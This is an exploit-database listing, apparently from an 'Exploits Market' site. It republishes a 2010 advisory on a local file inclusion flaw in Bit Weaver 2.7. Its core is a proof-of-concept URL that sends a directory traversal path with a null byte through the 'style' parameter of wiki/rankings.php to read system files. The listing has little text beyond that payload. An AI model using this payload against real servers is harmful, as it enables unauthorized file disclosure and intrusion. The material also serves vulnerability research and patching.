[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Bit Weaver v2.7 Local File Inclusion Vulnerability

Author
John Leitch
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13080
Category
web applications
Date add
02-07-2010
Platform
php
==================================================
Bit Weaver v2.7 Local File Inclusion Vulnerability
==================================================


------------------------------------------------------------------------
Software................Bit Weaver 2.7
Vulnerability...........Local File Inclusion
Download................http://www.bitweaver.org/
Release Date............7/1/2010
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................John Leitch
Site....................http://cross-site-scripting.blogspot.com/
Email...................john.leitch5@gmail.com
------------------------------------------------------------------------
 
--Description--
 
A local file inclusion vulnerability in Bit Weaver 2.7 can be
exploited to include arbitrary files.
 
 
--PoC--
 
http://server/wiki/rankings.php?style=../../../../../../../../windows/system.ini%00



#  0day.today [2024-06-24]  #